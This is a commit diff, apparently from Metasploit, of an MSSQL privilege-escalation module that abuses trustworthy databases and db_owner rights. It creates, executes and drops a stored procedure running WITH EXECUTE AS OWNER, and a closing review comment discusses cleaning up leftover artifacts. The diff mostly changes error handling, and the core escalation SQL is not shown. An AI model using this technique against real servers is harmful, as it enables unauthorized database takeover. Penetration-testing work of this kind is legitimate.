requested updates

bug/bundler_fix
nullbind 2014-10-06 23:52:30 -05:00
parent ebf4e5452e
commit 031fb19153
1 changed files with 117 additions and 122 deletions


@ -39,11 +39,7 @@ class Metasploit3 < Msf::Auxiliary
# Query for sysadmin status
print_status("Checking if #{datastore['username']} has the sysadmin role...")
begin
mystatus = check_sysadmin
rescue
print_error('Sorry, the database connection failed.')
end
# Check if user has sysadmin role
if mystatus == 1
@ -51,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
else
# Check for trusted databases owned by sysadmins
print_status("You're NOT a sysadmin, let's try to change that.")
print_error("You're NOT a sysadmin, let's try to change that.")
print_status("Checking for trusted databases owned by sysadmins...")
trustdb_list = check_trustdbs
if trustdb_list == 0
@ -83,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("Fail buckets, something went wrong.")
end
else
print_error("Fail buckets, something went wrong.")
print_error("Error: #{escalate_status}")
end
end
end
@ -126,6 +122,10 @@ class Metasploit3 < Msf::Auxiliary
# Run query
result = mssql_query(sql, false) if mssql_login_datastore
disconnect
rescue
# Return on fail
return 0
end
# Parse query results
parse_results = result[:rows]
@ -134,10 +134,7 @@ class Metasploit3 < Msf::Auxiliary
# Return on success
return parse_results
rescue
# Return on fail
return 0
end
end
# ----------------------------------------------
@ -146,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
def check_db_owner(trustdb_list)
# Check if the user has the db_owner role is any databases
trustdb_list.each { |db|
begin
# Setup query
sql = "use #{db[0]};select db_name() as db,rp.name as database_role, mp.name as database_user
from [#{db[0]}].sys.database_role_members drm
@ -158,11 +155,14 @@ class Metasploit3 < Msf::Auxiliary
result = mssql_query(sql, false) if mssql_login_datastore
disconnect
begin
# Parse query results
parse_results = result[:rows]
if parse_results.any?
print_good("- db_owner on #{db[0]} found!")
return db[0]
else
return 0
end
rescue
print_error("- No db_owner on #{db[0]}")
@ -175,7 +175,6 @@ class Metasploit3 < Msf::Auxiliary
# ----------------------------------------------
def escalate_privs(dbowner_db)
# Create the evil stored procedure WITH EXECUTE AS OWNER
begin
# Setup query
evilsql_create = "use #{dbowner_db};
DECLARE @myevil as varchar(max)
@ -189,44 +188,41 @@ class Metasploit3 < Msf::Auxiliary
exec(@myevil);
select 1;"
begin
# Run query
mssql_query(evilsql_create, false) if mssql_login_datastore
disconnect
rescue
# Return error
error = 'Failed to create stored procedure.'
return error
end
# Run the evil stored procedure
begin
# Setup query
evilsql_run = "use #{dbowner_db};
DECLARE @myevil2 as varchar(max)
set @myevil2 = 'EXEC sp_elevate_me'
exec(@myevil2);"
begin
# Run query
mssql_query(evilsql_run, false) if mssql_login_datastore
disconnect
rescue
# Return error
error = 'Failed to run stored procedure.'
return error
end
# Remove evil procedure
begin
# Setup query
evilsql_remove = "use #{dbowner_db};
DECLARE @myevil3 as varchar(max)
set @myevil3 = 'DROP PROCEDURE sp_elevate_me'
exec(@myevil3);"
begin
# Run query
mssql_query(evilsql_remove, false) if mssql_login_datastore
disconnect
@ -234,7 +230,6 @@ class Metasploit3 < Msf::Auxiliary
# Return value
return 1
rescue
# Return error
error = 'Failed to run stored procedure.'
return error
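Review bot: The early `return error` in the rescue after the `evilsql_run` query leaves escalate_privs before the "Remove evil procedure" step, so when the run step raises, the `sp_elevate_me` procedure created WITH EXECUTE AS OWNER appears to stay behind in the target database. The drop should be attempted on every path that follows a successful create, for example from an `ensure` clause or a small cleanup helper called before each error return. The last rescue, which guards the DROP, also reuses the run-step text; `error = 'Failed to remove stored procedure sp_elevate_me, remove it manually.'` would tell the operator that an artifact remains on the server. The +/- markers are lost in this rendering, so the begin/rescue nesting on the new side is inferred from the visible lines.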